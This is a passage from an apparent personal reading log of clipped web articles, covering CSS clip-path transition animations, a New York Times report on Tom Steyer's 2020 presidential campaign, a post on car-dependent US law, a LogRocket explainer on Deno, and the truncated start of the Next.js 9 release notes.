the slots transition above. Instead of sections along the top, it creates vertical sections that are placed in line with each other to create the entire square. Starting with the upper-left the second vertex is positioned at the top and 20% to the right. The next vertex is placed in the same place horizontally but is at the bottom of the element. The next vertex after that is in the same spot with the next one back at the top on top of the vertex from two steps ago. This is repeated several times across the element until the right side is reached. If the lines of the shape were visible, then it would appear as a series of vertical sections lined up horizontally across the element. During the animation the left side of each section is moved over to be on top of the right side. This creates a wiping effect that looks like vertical shutters of a window. The enter transition plays the animation in reverse. .shutters-enter-active { animation: 1s shutters reverse; } .shutters-leave-active { animation: 1s shutters; } @keyframes shutters { 0% { clip-path: polygon(0% 0%, 20% 0%, 20% 100%, 20% 100%, 20% 0%, 40% 0%, 40% 100%, 40% 100%, 40% 0%, 60% 0%, 60% 100%, 60% 100%, 60% 0%, 80% 0%, 80% 100%, 80% 100%, 80% 0%, 100% 0%, 100% 100%, 0% 100%); } 100% { clip-path: polygon(20% 0%, 20% 0%, 20% 100%, 40% 100%, 40% 0%, 40% 0%, 40% 100%, 60% 100%, 60% 0%, 60% 0%, 60% 100%, 80% 100%, 80% 0%, 80% 0%, 80% 100%, 100% 100%, 100% 0%, 100% 0%, 100% 100%, 20% 100%); } } Star The star transition takes advantage of how clip-path renders positive and negative space when the lines defining the shape overlap and cross each other. The shape starts as a square with eight vertices; one in each corner and one on each side. There are only three keyframes but there’s a large amount of movement in each one. The leave transition starts with the square and then moves each vertex on a side to the opposite side. Therefore, the top vertex goes to the bottom, the bottom vertex goes to the top, and the vertices on the left and right do the same swap. This creates criss-crossing lines that form a star shape in the positive space. The final keyframe then moves the vertices in each corner to the center of the shape which makes the star collapse in on itself wiping the element away. The enter transition plays the same in reverse. .star-enter-active { animation: 1s star reverse; } .star-leave-active { animation: 1s star; } @keyframes star { 0% { clip-path: polygon(0% 0%, 50% 0%, 100% 0%, 100% 50%, 100% 100%, 50% 100%, 0% 100%, 0% 50%); } 50% { clip-path: polygon(0% 0%, 50% 100%, 100% 0%, 0% 50%, 100% 100%, 50% 0%, 0% 100%, 100% 50%); } 100% { clip-path: polygon(50% 50%, 50% 100%, 50% 50%, 0% 50%, 50% 50%, 50% 0%, 50% 50%, 100% 50%); } } Path shapes OK, so we’ve looked at a lot of examples of animations using clip-path shape functions. One function we haven’t spent time with is path. It’s perhaps the most flexible of the bunch because we can draw custom, or even multiple, shapes with it. Chris has written and even spoken on it before. So, while I created demo for this set of examples as well, note that clip-path paths are experimental technology. As of this writing, it’s only available in Firefox 63 or higher behind the layout.css.clip-path-path.enabled flag, which can be enabled in about:config. See the Pen Animating Clip-Path: Path Shapes by Travis Almand (@talmand) on CodePen. This demo shows several uses of paths that are animated for transitions. The paths are the same type of paths found in SVG and can be lifted from the path attribute to be used in the clip-path CSS property on an element. Each of the paths in the demo were actually taken from SVG I made by hand for each keyframe of the animations. Much like animating with the polygon shape, careful planning is required as the number of vertices in the path cannot change but only manipulated. An advantage to using paths is that it can consist of multiple shapes within the path, each animated separately to have fine-tune control over the positive and negative space. Another interesting aspect is that the path supports Bézier curves. Creating the vertices is similar to the polygon shape, but polygon doesn’t support Bézier curves. A bonus of this feature is that even the curves can be animated. That said, a disadvantage is that a path has to be built specifically for the size of the element. That’s because there is no percentage-based placement, like we have with the other clip-path shapes . So, all the demos for this article have elements that are 200px square, and the paths in this specific demo are built for that size. Any other size or dimensions will lead to different outcomes. Alright, enough talk. Let’s get to the examples because they’re pretty sweet. Iris The iris transition consists of four small shapes that form together to make a complete large shape that splits in an iris pattern, much like a sci-fi type door. Each shape has its vertices moved and slightly rotated in the direction away from the center to move off their respective side of the element. This is done with only two keyframes. The leave transition has the shapes move out of view while the enter transition reverses the effect. The path is formatted in a way to make each shape in the path obvious. Each line that starts with "M" is a new shape in the path. .iris-enter-active { animation: 1s iris reverse; } .iris-leave-active { animation: 1s iris; } @keyframes iris { 0% { clip-path: path(' M103.13 100C103 32.96 135.29 -0.37 200 0L0 0C0.35 66.42 34.73 99.75 103.13 100Z M199.35 200C199.83 133.21 167.75 99.88 103.13 100C102.94 165.93 68.72 199.26 0.46 200L199.35 200Z M103.13 100C167.46 99.75 199.54 133.09 199.35 200L200 0C135.15 -0.86 102.86 32.47 103.13 100Z M0 200C68.63 200 103 166.67 103.13 100C34.36 100.12 -0.02 66.79 0 0L0 200Z '); } 100% { clip-path: path(' M60.85 2.56C108.17 -44.93 154.57 -45.66 200.06 0.35L58.64 -141.07C11.93 -93.85 12.67 -45.97 60.85 2.56Z M139.87 340.05C187.44 293.16 188.33 246.91 142.54 201.29C95.79 247.78 48.02 247.15 -0.77 199.41L139.87 340.05Z M201.68 61.75C247.35 107.07 246.46 153.32 199.01 200.5L340.89 59.54C295.65 13.07 249.25 13.81 201.68 61.75Z M-140.61 141.25C-92.08 189.78 -44.21 190.51 3.02 143.46C-45.69 94.92 -46.43 47.05 0.81 -0.17L-140.61 141.25Z '); } } Melt The melt transition consists of two different animations for both entering and leaving. In the leave transition, the path is a square but the top side is made up of several Bézier curves. At first, these curves are made to be completely flat and then are animated downward to stop beyond the bottom of the shape. As these curves move downward, they are animated in different ways so that each curve adjusts differently than the others. This gives the appearance of the element melting out of view below the bottom. The enter transition does much the same, except that the curves are on the bottom of the square. The curves start at the top and are completely flat. Then they are animated downward with the same curve adjustments. This gives the appearance of the second element melting into view to the bottom. .melt-enter-active { animation: 2s melt-enter; } .melt-leave-active { animation: 2s melt-leave; } @keyframes melt-enter { 0% { clip-path: path('M0 -0.12C8.33 -8.46 16.67 -12.62 25 -12.62C37.5 -12.62 35.91 0.15 50 -0.12C64.09 -0.4 62.5 -34.5 75 -34.5C87.5 -34.5 87.17 -4.45 100 -0.12C112.83 4.2 112.71 -17.95 125 -18.28C137.29 -18.62 137.76 1.54 150.48 -0.12C163.19 -1.79 162.16 -25.12 174.54 -25.12C182.79 -25.12 191.28 -16.79 200 -0.12L200 -34.37L0 -34.37L0 -0.12Z'); } 100% { clip-path: path('M0 199.88C8.33 270.71 16.67 306.13 25 306.13C37.5 306.13 35.91 231.4 50 231.13C64.09 230.85 62.5 284.25 75 284.25C87.5 284.25 87.17 208.05 100 212.38C112.83 216.7 112.71 300.8 125 300.47C137.29 300.13 137.76 239.04 150.48 237.38C163.19 235.71 162.16 293.63 174.54 293.63C182.79 293.63 191.28 262.38 200 199.88L200 0.13L0 0.13L0 199.88Z'); } } @keyframes melt-leave { 0% { clip-path: path('M0 0C8.33 -8.33 16.67 -12.5 25 -12.5C37.5 -12.5 36.57 -0.27 50 0C63.43 0.27 62.5 -34.37 75 -34.37C87.5 -34.37 87.5 -4.01 100 0C112.5 4.01 112.38 -18.34 125 -18.34C137.62 -18.34 138.09 1.66 150.48 0C162.86 -1.66 162.16 -25 174.54 -25C182.79 -25 191.28 -16.67 200 0L200 200L0 200L0 0Z'); } 100% { clip-path: path('M0 200C8.33 270.83 16.67 306.25 25 306.25C37.5 306.25 36.57 230.98 50 231.25C63.43 231.52 62.5 284.38 75 284.38C87.5 284.38 87.5 208.49 100 212.5C112.5 216.51 112.38 300.41 125 300.41C137.62 300.41 138.09 239.16 150.48 237.5C162.86 235.84 162.16 293.75 174.54 293.75C182.79 293.75 191.28 262.5 200 200L200 200L0 200L0 200Z'); } } Door The door transition is similar to the iris transition we looked at first — it’s a "door" effect with shapes that move independently of each other. The path is made up of four shapes: two are half-circles located at the top and bottom while the other two split the left over positive space. This shows that, not only can each shape in the path animate separately from each other, they can also be completely different shapes. In the leave transition, each shape moves away from the center out of view on its own side. The top half-circle moves upward leaving a hole behind and the bottom half-circle does the same. The left and right sides then slide away in a separate keyframe. Then the enter transition simply reverses the animation. .door-enter-active { animation: 1s door reverse; } .door-leave-active { animation: 1s door; } @keyframes door { 0% { clip-path: path(' M0 0C16.03 0.05 32.7 0.05 50 0C50.05 27.36 74.37 50.01 100 50C99.96 89.53 100.08 136.71 100 150C70.48 149.9 50.24 175.5 50 200C31.56 199.95 14.89 199.95 0 200L0 0Z M200 0C183.46 -0.08 166.79 -0.08 150 0C149.95 21.45 133.25 49.82 100 50C100.04 89.53 99.92 136.71 100 150C130.29 150.29 149.95 175.69 150 200C167.94 199.7 184.6 199.7 200 200L200 0Z M100 50C130.83 49.81 149.67 24.31 150 0C127.86 0.07 66.69 0.07 50 0C50.26 23.17 69.36 49.81 100 50Z M100 150C130.83 150.19 149.67 175.69 150 200C127.86 199.93 66.69 199.93 50 200C50.26 176.83 69.36 150.19 100 150Z '); } 50% { clip-path: path(' M0 0C16.03 0.05 32.7 0.05 50 0C50.05 27.36 74.37 50.01 100 50C99.96 89.53 100.08 136.71 100 150C70.48 149.9 50.24 175.5 50 200C31.56 199.95 14.89 199.95 0 200L0 0Z M200 0C183.46 -0.08 166.79 -0.08 150 0C149.95 21.45 133.25 49.82 100 50C100.04 89.53 99.92 136.71 100 150C130.29 150.29 149.95 175.69 150 200C167.94 199.7 184.6 199.7 200 200L200 0Z M100 -6.25C130.83 -6.44 149.67 -31.94 150 -56.25C127.86 -56.18 66.69 -56.18 50 -56.25C50.26 -33.08 69.36 -6.44 100 -6.25Z M100 206.25C130.83 206.44 149.67 231.94 150 256.25C127.86 256.18 66.69 256.18 50 256.25C50.26 233.08 69.36 206.44 100 206.25Z '); } 100% { clip-path: path(' M-106.25 0C-90.22 0.05 -73.55 0.05 -56.25 0C-56.2 27.36 -31.88 50.01 -6.25 50C-6.29 89.53 -6.17 136.71 -6.25 150C-35.77 149.9 -56.01 175.5 -56.25 200C-74.69 199.95 -91.36 199.95 -106.25 200L-106.25 0Z M306.25 0C289.71 -0.08 273.04 -0.08 256.25 0C256.2 21.45 239.5 49.82 206.25 50C206.29 89.53 206.17 136.71 206.25 150C236.54 150.29 256.2 175.69 256.25 200C274.19 199.7 290.85 199.7 306.25 200L306.25 0Z M100 -6.25C130.83 -6.44 149.67 -31.94 150 -56.25C127.86 -56.18 66.69 -56.18 50 -56.25C50.26 -33.08 69.36 -6.44 100 -6.25Z M100 206.25C130.83 206.44 149.67 231.94 150 256.25C127.86 256.18 66.69 256.18 50 256.25C50.26 233.08 69.36 206.44 100 206.25Z '); } } X-Plus This transition is different than most of the demos for this article. That’s because other demos show animating the "positive" space of the clip-path for transitions. It turns out that animating the "negative" space can be difficult with the traditional clip-path shapes. It can be done with the polygon shape but requires careful placement of vertices to create the negative space and animate them as necessary. This demo takes advantage of having two shapes in the path; there’s one shape that’s a huge square surrounding the space of the element and another shape in the center of this square. The center shape (in this case an x or +) excludes or "carves" out negative space in the outside shape. Then the center shape’s vertices are animated so that only the negative space is being animated. The leave animation starts with the center shape as a tiny "x" that grows in size until the element is wiped from view. The enter animation the center shape is a "+" that is already larger than the element and shrinks down to nothing. .x-plus-enter-active { animation: 1s x-plus-enter; } .x-plus-leave-active { animation: 1s x-plus-leave; } @keyframes x-plus-enter { 0% { clip-path: path('M-400 600L-400 -400L600 -400L600 600L-400 600ZM0.01 -0.02L-200 -0.02L-200 199.98L0.01 199.98L0.01 400L200.01 400L200.01 199.98L400 199.98L400 -0.02L200.01 -0.02L200.01 -200L0.01 -200L0.01 -0.02Z'); } 100% { clip-path: path('M-400 600L-400 -400L600 -400L600 600L-400 600ZM98.33 98.33L95 98.33L95 101.67L98.33 101.67L98.33 105L101.67 105L101.67 101.67L105 101.67L105 98.33L101.67 98.33L101.67 95L98.33 95L98.33 98.33Z'); } } @keyframes x-plus-leave { 0% { clip-path: path('M-400 600L-400 -400L600 -400L600 600L-400 600ZM96.79 95L95 96.79L98.2 100L95 103.2L96.79 105L100 101.79L103.2 105L105 103.2L101.79 100L105 96.79L103.2 95L100 98.2L96.79 95Z'); } 100% { clip-path: path('M-400 600L-400 -400L600 -400L600 600L-400 600ZM-92.31 -200L-200 -92.31L-7.69 100L-200 292.31L-92.31 400L100 207.69L292.31 400L400 292.31L207.69 100L400 -92.31L292.31 -200L100 -7.69L-92.31 -200Z'); } } Drops The drops transition takes advantage of the ability to have multiple shapes in the same path. The path has ten circles placed strategically inside the area of the element. They start out as tiny and unseen, then are animated to a larger size over time. There are ten keyframes in the animation and each keyframe resizes a circle while maintaining the state of any previously resized circle. This gives the appearance of circles popping in or out of view one after the other during the animation. The leave transition has the circles being shrunken out of view one at a time and the negative space grows to wipe out the element. The enter transition plays the animation in reverse so that the circles enlarge and the positive space grows to reveal the new element. The CSS used for the drops transition is rather large, so take a look at the CSS section of the CodePen demo starting with the .drops-enter-active selector. Numbers This transition is similar to the x-plus transition above — it uses a negative shape for the animation inside a larger positive shape. In this demo, the animated shape changes through the numbers 1, 2, and 3 until the element is wiped away or revealed. The numeric shapes were created by manipulating the vertices of each number into the shape of the next number. So, each number shape has the same number of vertices and curves that animate correctly from one to the next. The leave transition starts with the shape in the center but is made to be unseen. It then animates into the shape of the first number. The next keyframe animates to the next number and so no, then plays in reverse. The CSS used for this is ginormous just like the last one, so take a look at the CSS section of the CodePen demo starting with the .numbers-enter-active selector. Hopefully this article has given you a good idea of how clip-path can be used to create flexible and powerful animations that can be both straightforward and complex. Animations can add a nice touch to a design and even help provide context when switching from one state to another. At the same time, remember to be mindful of those who may prefer to limit the amount of animation or movement, for example, by setting reduced motion preferences. Source: Animating with Clip-Path | CSS-Tricks

    Read at 04:01 pm, Jul 11th

  • Tom Steyer Will Run for President and Plans to Spend $100 Million on His Bid - The New York Times

    Image Tom Steyer, appearing in Des Moines in January, has focused on pushing for the impeachment of President Trump.CreditCreditRachel Mummey for The New York Times Tom Steyer, the former hedge fund investor turned impeachment activist, announced on Tuesday that he would challenge President Trump in 2020, reversing a previous decision not to enter the race. In a video announcing his campaign, Mr. Steyer positioned himself as a populist outsider, railing against corporate interests that he described as holding too much sway over the political system. “Americans are deeply disappointed and hurt by the way they’re treated by what they think is the power elite in Washington, D.C.,” Mr. Steyer said in the video. “And that goes across party lines and it goes across geography.” Included in the video were images of men who, Mr. Steyer seemed to imply, represented the excesses of corruption and greed, including Paul Manafort, Mr. Trump’s incarcerated former adviser; Bernard Madoff, the notorious Ponzi schemer; and Jeffrey Epstein, the investor who was indicted this week on charges of sex trafficking. Mr. Steyer said in an interview that he would hit the campaign trail quickly: After speaking at the liberal Netroots Nation conference in Philadelphia, he said he would campaign in the early primary state of South Carolina. He said he would unveil a plan for “structural changes” in the campaign finance system in the next few weeks and pledged to release his tax returns, though he did not set a deadline for doing so. Mr. Steyer may be a questionable vessel for a populist message, as a billionaire financier in a party increasingly defined by concern for economic inequality, and as a 62-year-old white man in a Democratic Party preoccupied with racial diversity and gender equality. Yet his candidacy instantly transformed the financial shape of the primary. Alberto Lammers, a spokesman for his campaign, said Mr. Steyer planned to spend “at least $100 million” on the race, starting with a round of television ads in Iowa, New Hampshire and South Carolina. That figure exceeds the total fund-raising over the last three months by Joseph R. Biden Jr., Pete Buttigieg, Elizabeth Warren, Bernie Sanders and Kamala Harris — combined. A $100 million budget would represent about half the cost of Hillary Clinton’s 2016 primary campaign; most candidates who run for president spend a fraction of that sum. Another reinvention for Steyer Mr. Steyer’s opening message represents the latest incarnation of a figure who has played a highly unpredictable role in Democratic politics. In his announcement video, he made no mention of the issue that has consumed his political activities for the last two years — impeaching Mr. Trump — and instead borrowed from the rhetoric of leading Democratic candidates like Mr. Sanders and Ms. Warren. Among the targets in his announcement video: fossil-fuel companies that he accused of torching the planet for short-term profits, drug companies he blamed for the opioid crisis and “banks screwing people on their mortgages.” In the interview Tuesday, Mr. Steyer endorsed several policy stances that aligned him squarely, though not uniformly, with the progressive wing of his party. He said he supported decriminalizing unauthorized border crossings and expanding the size of the Supreme Court, and endorsed the creation of a government-backed health care option but not the elimination of private health insurance. People should shift toward government-backed care “by choice, not by fiat,” he said. There is little doubt that a message of government reform has broad appeal to Democrats. But Mr. Steyer is also now on his third signature issue in little more than half a decade — after first championing climate change as a campaign topic, and then presidential impeachment — and he will have to compete with more than a handful of other Democrats trumpeting clean-government themes. Some of those candidates can be expected to push back on Mr. Steyer’s self-presentation: Mr. Sanders, for one, said on MSNBC that he liked Mr. Steyer personally but was “a bit tired of seeing billionaires trying to buy political power.” And Ms. Warren wrote on Twitter, in a clear reference to Mr. Steyer: “The Democratic primary should not be decided by billionaires, whether they’re funding Super PACs or funding themselves.” Mr. Steyer also may have to defend his own business record, as the founder of Farallon Capital, an investment firm that had more than $20 billion under its management when he left in 2012. A Democratic version of Trump? A wealthy outsider. An appetite for controversy. A huge personal fortune. No experience in governing. An on-the-fly decision to run for president. Sound familiar? More than any other candidate in the race, Mr. Steyer may test Democrats’ interest in nominating a Trump-like champion of their own. The comparison is imperfect: Mr. Steyer is a quirky patrician from the Bay Area who enunciates his words carefully, cares passionately about climate change and adores the novel “Lonesome Dove.” Mr. Trump is, well, none of those things. But Mr. Steyer brings to the race a contempt for traditional politicians and a sprawling confidence in himself that make him at least a faint echo of the current president. By embracing impeachment as a personal cause during the midterm elections, ignoring the entreaties of Democratic leaders like House Speaker Nancy Pelosi, Mr. Steyer claimed a role as one of his party’s chief provocateurs. It is not clear how that attitude might translate into a primary campaign. Other Democrats have stretched and strained the boundaries of conventional party politics, but mainly with their policy ideas. Mr. Steyer, by contrast, has yet to translate his mélange of political attitudes and priorities into a consistent platform. That may have to change quickly if he is to be a serious contender. In the interview, Mr. Steyer allowed there were “some superficial comparisons” between himself and Mr. Trump, but said they would disintegrate “if you look at who I am, what I’ve done, what I stand for.” “I have been, for the last 7 to 10 years, going across America and looking citizens in the eye in almost all the states,” he said. “I have been listening to what their concerns are.” Sharp and unpredictable elbows Mr. Steyer has one other trait in common with Mr. Trump: He is willing to spar directly with members of his own party, for a combination of strategic and impulsive reasons. After spending years as a donor to mainstream Democratic Party leaders, Mr. Steyer veered in a sharply confrontational direction after the 2016 election, trashing the “establishment” and taking aim at individual party elders. [Which Democrats are leading the 2020 presidential race this week?] Toying with a run for the Senate, he publicly blasted Senator Dianne Feinstein, the long-serving moderate Democrat, and endorsed a liberal challenger to oppose her. Crusading for Mr. Trump’s impeachment, Mr. Steyer used his personal advocacy group to apply pressure on powerful House committee chairmen, like Representatives Richard E. Neal of Massachusetts and Jerrold Nadler of New York. Should Mr. Steyer bring that pugilistic stance to the presidential race, it could represent a major disruption in a campaign largely defined by the candidates’ aversion to conflict. Still, even as Mr. Steyer has clashed with Democratic leaders, he has continued to underwrite the party’s campaigns and causes prolifically — a practice he said would continue during the presidential race. His funding for voter-turnout initiatives aimed at state-level elections, he said, would continue unabated. The campaign might finally be televised Of the tens of millions of dollars already raised and spent in the Democratic primary, only a trifling amount has been used to finance television commercials. The candidates have focused instead on building voter-mobilizing organizations, and on digital advertising. Mr. Steyer has already started to change that, launching his campaign with an early-state television blitz. [Sign up for our politics newsletter and join the conversation about the 2020 presidential race.] As an environmentalist and pro-impeachment activist, Mr. Steyer spent immense sums on television, including tens of millions of dollars’ worth of commercials during the 2018 elections demanding that Mr. Trump be removed from office. The ads featured Mr. Steyer himself in a starring role, a cardigan-clad tribune of moral outrage. With no practical limit to his spending, Mr. Steyer can be expected to deliver his message aggressively over the airwaves, potentially crowding out other competitors who lack a billionaire’s checkbook. But Mr. Steyer’s reliance on his personal wealth and traditional advertising also speaks to his flaws as a candidate: Unlike other contenders, he lacks a record of well-known accomplishments to build on. And starting so late in the race, he may have to buy the kind of stature that others — like Mr. Buttigieg and Ms. Warren — have built chiefly with their oratory and ideas. Asked why he would opt to run a campaign with his personal fortune, rather than seeking out small-donor support, Mr. Steyer deflected the question. ”I think the point on this,” he said, “is going to be: who connects with the American people?” A version of this article appears in print on , Section A , Page 23 of the New York edition with the headline: Billionaire Adds Name, And Lots of His Money, To Democrats’ Primary. Order Reprints | Today’s Paper | Subscribe Source: Tom Steyer Will Run for President and Plans to Spend $100 Million on His Bid – The New York Times

    Read at 03:55 pm, Jul 11th

  • America’s Cars Are Heavily Subsidized, Dangerous, and Mandatory

    This is a fascinating & provocative article from law professor Gregory Shill: Americans Shouldn’t Have to Drive, but the Law Insists on It. The first line of the piece sets the stage: “In a country where the laws compel the use of cars, Americans are condemned to lose friends and relatives to traffic violence.” Let’s begin at the state and local level. A key player in the story of automobile supremacy is single-family-only zoning, a shadow segregation regime that is now justifiably on the defensive for outlawing duplexes and apartments in huge swaths of the country. Through these and other land-use restrictions-laws that separate residential and commercial areas or require needlessly large yards-zoning rules scatter Americans across distances and highway-like roads that are impractical or dangerous to traverse on foot. The resulting densities are also too low to sustain high-frequency public transit. Further entrenching automobile supremacy are laws that require landowners who build housing and office space to build housing for cars as well. In large part because of parking quotas, parking lots now cover more than a third of the land area of some U.S. cities; Houston is estimated to have 30 parking spaces for every resident. As UCLA urban planning professor Donald Shoup has written, this mismatch flows from legal mandates rather than market demand. Every employee who brings a car to the office essentially doubles the amount of space he takes up at work, and in urban areas his employer may be required by law to build him a $50,000 garage parking space. Cars and car ownership are massively subsidized on a state, local, and federal level and our laws and regulations have built a nation where cars are mandatory and “driving is the price of first-class citizenship”. Why are we taxing bus riders to pay rich people to buy McMansions and luxury electric SUVs? And this speed limit thing is just eye-poppingly fucked up: The National Transportation Safety Board has determined that speed is a top risk factor in motor vehicle crashes. Yet the most prominent way of setting and adjusting speed limits, known as the operating speed method, actually incentivizes faster driving. It calls for setting speed limits that 85 percent of drivers will obey. This method makes little provision for whether there’s a park or senior center on a street, or for people walking or biking. As a matter of law, the operating speed method is exceptional. It enables those who violate the law-speeding motorists-to rewrite it: speed limits ratchet higher until no more than 15 percent of motorists violate them. The perverse incentives are obvious. Imagine a rule saying that, once 15 percent of Americans acquired an illegal type of machine gun, that weapon would automatically become legal. Ok, this is one of those articles where I want to excerpt every paragraph…just go read the whole thing. (via @olgakhazan) More about... Source: America’s Cars Are Heavily Subsidized, Dangerous, and Mandatory

    Read at 03:30 pm, Jul 11th

  • What's Deno, and how is it different from Node.js? - LogRocket Blog

    Ryan Dahl, creator of Node.js, has spent the last year and a half working on Deno, a new runtime for JavaScript that is supposed to fix all the inherent problems of Node. Don’t get me wrong, Node is a great server-side JavaScript runtime in its own right, mostly due to its vast ecosystem and the usage of JavaScript. However, Dahl admits there are a few things he should have thought about more — security, modules, and dependencies, to name a few. In his defense, it’s not like he could envision how much the platform would grow in such a short period of time. Also, back in 2009, JavaScript was still this weird little language that everyone made fun of, and many of its features weren’t there yet. What is Deno, and what are its main features? Deno is a secure Typescript runtime built on V8, the Google runtime engine for JavaScript. It was built with: Rust (Deno’s core was written in Rust, Node’s in C++) Tokio (the event loop written in Rust) TypeScript (Deno supports both JavaScript and TypeScript out of the box) V8 (Google’s JavaScript runtime used in Chrome and Node, among others) So let’s see what features Deno offers. Security (permissions) Among the most important of Deno’s features is its focus on security. As opposed to Node, Deno by default executes the code in a sandbox, which means that runtime has no access to: The file system The network Execution of other scripts The environment variables Let’s take a look at how the permission system works. (async () => { const encoder = new TextEncoder(); const data = encoder.encode('Hello worldn'); await Deno.writeFile('hello.txt', data); await Deno.writeFile('hello2.txt', data); })(); The script creates two text files called hello.txt and hello2.txt with a Hello world message within. The code is being executed inside a sandbox, so it has no access to the file system. Also note that we are using the Deno namespace instead of the fs module, as we would in Node. The Deno namespace provides many fundamental helper functions. By using the namespace, we are losing the browser compatibility, which will be discussed later on. When we run it by executing: deno run write-hello.ts We are prompted with the following: ⚠️Deno requests write access to "/Users/user/folder/hello.txt". Grant? [a/y/n/d (a = allow always, y = allow once, n = deny once, d = deny always)] We are actually prompted twice since each call from the sandbox must ask for permission. Of course if we chose the allow always option, we would only get asked once. If we choose the deny option, the PermissionDenied error will be thrown, and the process will be terminated since we don’t have any error-handling logic. If we execute the script with the following command: deno run --allow-write write-hello.ts There are no prompts and both files are created. Aside from the --allow-write flag for the file system, there are also --allow-net, --allow-env, and --allow-run flags to enable network requests, access the environment, and for running subprocesses, respectively. Modules Deno, just like browsers, loads modules by URLs. Many people got confused at first when they saw an import statement with a URL on the server side, but it actually makes sense — just bear with me: import { assertEquals } from "https://deno.land/std/testing/asserts.ts"; What’s the big deal with importing packages by their URLs, you may ask? The answer is simple: by using URLs, Deno packages can be distributed without a centralized registry such as npm, which recently has had a lot of problems, all of them explained here. By importing code via URL, we make it possible for package creators to host their code wherever they see fit — decentralization at its finest. No more package.json and node_modules. When we start the application, Deno downloads all the imported modules and caches them. Once they are cached, Deno will not download them again until we specifically ask for it with the --reload flag. There are a few important questions to be asked here: What if a website goes down? Since it’s not a centralized registry, the website that hosts the module may be taken down for many reasons. Depending on its being up during development — or, even worse, during production — is risky. As we mentioned before, Deno caches the downloaded modules. Since the cache is stored on our local disk, the creators of Deno recommend checking it in our version control system (i.e., git) and keeping it in the repository. This way, even when the website goes down, all the developers retain access to the downloaded version. Deno stores the cache in the directory specified under the $DENO_DIR environmental variable. If we don’t set the variable ourselves, it will be set to the system’s default cache directory. We can set the $DENO_DIR somewhere in our local repository and check it into the version control system. Do I have to import it by the URL all the time? Constantly typing URLs would be very tedious. Thankfully, Deno presents us with two options to avoid doing that. The first option is to re-export the imported module from a local file, like so: export { test, assertEquals } from "https://deno.land/std/testing/mod.ts"; Let’s say the file above is called local-test-utils.ts. Now, if we want to again make use of either test or assertEquals functions, we can just reference it like this: import { test, assertEquals } from './local-test-utils.ts'; So it doesn’t really matter if it’s loaded from a URL or not. The second option is to create an imports map, which we specify in a JSON file: { "imports": { "http/": "https://deno.land/std/http/" } } And then import it as such: import { serve } from "http/server.ts"; In order for it to work, we have to tell Deno about the imports map by including the --importmap flag: deno run --importmap=import_map.json hello_server.ts What about package versioning? Versioning has to be supported by the package provider, but from the client side it comes down to just setting the version number in the URL like so: https://unpkg.com/liltest@0.0.5/dist/liltest.js. Browser compatibility Deno aims to be browser-compatible. Technically speaking, when using the ES modules, we don’t have to use any build tools like webpack to make our application ready to use in a browser. However, tools like Babel will transpile the code to the ES5 version of JavaScript, and as a result, the code can be run even in older browsers that don’t support all the newest features of the language. But that also comes at the price of including a lot of unnecessary code in the final file and bloating the output file. It is up to us to decide what our main goal is and choose accordingly. TypeScript support out of the box Deno makes it easy to use TypeScript without the need for any config files. Still, it is possible to write programs in plain JavaScript and execute them with Deno without any trouble. Summary Deno, the new runtime for TypeScript and JavaScript, is an interesting project that has been steadily growing for quite some time now. But it still has a long way to go before it’s considered production-ready. With it’s decentralized approach, it takes the necessary step of freeing the JavaScript ecosystem from the centralized package registry that is npm. Dahl says that he expects to release version 1.0 by the end of the summer, so if you are interested in Deno’s future developments, star its repository. Plug: LogRocket, a DVR for web apps LogRocket is a frontend logging tool that lets you replay problems as if they happened in your own browser. Instead of guessing why errors happen, or asking users for screenshots and log dumps, LogRocket lets you replay the session to quickly understand what went wrong. It works perfectly with any app, regardless of framework, and has plugins to log additional context from Redux, Vuex, and @ngrx/store. In addition to logging Redux actions and state, LogRocket records console logs, JavaScript errors, stacktraces, network requests/responses with headers + bodies, browser metadata, and custom logs. It also instruments the DOM to record the HTML and CSS on the page, recreating pixel-perfect videos of even the most complex single-page apps. Try it for free. Source: What’s Deno, and how is it different from Node.js? – LogRocket Blog

    Read at 03:07 pm, Jul 11th

  • Blog - Next.js 9 | Next.js

    After 70 canary releases we are pleased to introduce Next.js 9, featuring: As always, we have strived to ensure all these benefits are backwards compatible. For most Next.js applications, all you need to do is run: npm i next@latest react@latest react-dom@latest There are very few cases where your codebase might require changes. See the upgrade guide for more information. Since our last release, we’re happy to have seen companies like IGN, Bang & Olufsen, Intercom, Buffer, and Ferrari launch with Next.js. Check out the showcase for more! One year ago Next.js 6 introduced basic TypeScript support through a plugin called @zeit/next-typescript. Users also had to customize their .babelrc and enable it in next.config.js. When configured, the plugin would allow .ts and .tsx files to be built by Next.js. However, it did not integrate type-checking, nor were types provided by Next.js core. This meant a community package had to be maintained separately in DefinitelyTyped that could be out of sync with releases. While talking with many users, existing and new, it became clear that most were very interested in using TypeScript. They wanted a more reliable and standard solution for easily integrating TypeScript into their existing or new codebase. For that reason, we set out to integrate TypeScript support into the Next.js core, improving developer experience, and making it faster in the process. Automated Setup Getting started with TypeScript in Next.js is easy: rename any file, page or component, from .js to .tsx. Then, run next dev! This will cause Next.js to detect TypeScript is being used in your project. The Next.js CLI will guide you through installing the necessary types for React and Node.js. Next.js will also create a default tsconfig.json with sensible defaults if not already present. This file allows for integrated type-checking in editors like Visual Studio Code. Integrated Type-Checking Next.js handles type-checking for you in both development and building for production. While in development Next.js will show you type errors after saving a file. Type-checking happens in the background, allowing you to interact with your updated application in the browser instantly. Type errors will propagate to the browser as they become available. Next.js will also automatically fail the production build (i.e. next build) if type errors are present. This helps prevent shipping broken code to production. Next.js Core Written in TypeScript Over the past few months we’ve migrated most of the codebase to TypeScript, this has not only reinforced our code quality, it also allows us to provide types for all core modules. For example, when you import next/link, editors that support TypeScript will show the allowed properties and which values they accept. Dynamic routing (also known as URL Slugs or Pretty/Clean URLs) was one of the first feature requests on GitHub after Next.js was released 2.5 years ago! The issue was “solved” in Next.js 2.0 by introducing the custom server API for using Next.js programmatically. This allowed using Next.js as a rendering engine, enabling abstractions and mapping of incoming URLs to render certain pages. We spoke with users and examined many of their applications, finding that many of them had a custom server. A pattern emerged: the most prominent reason for the custom server was dynamic routing. However, a custom server comes with its own pitfalls: routing is handled at the server level instead of the proxy, it is deployed and scaled as a monolith, and it is prone to performance issues. Since a custom server requires the entire application to be available in one instance, it is typically difficult to deploy to a Serverless environment that solves these issues. Serverless requests are routed at the proxy layer and are scaled/executed independently to avoid performance bottlenecks. Additionally, we believe we can offer a better Developer Experience! Much of Next.js' magic starts when you create a file named pages/blog.js and suddenly have a page accessible at /blog. Why should a user need to create their own server and learn about Next.js' programmatic API to support a route like /blog/my-first-post (/blog/:id)? Based on this feedback and vision, we started investigating route mapping solutions, driven by what users already knew: the pages/ directory. Creating a Dynamically Routed Page Next.js supports creating routes with basic named parameters, a pattern popularized by 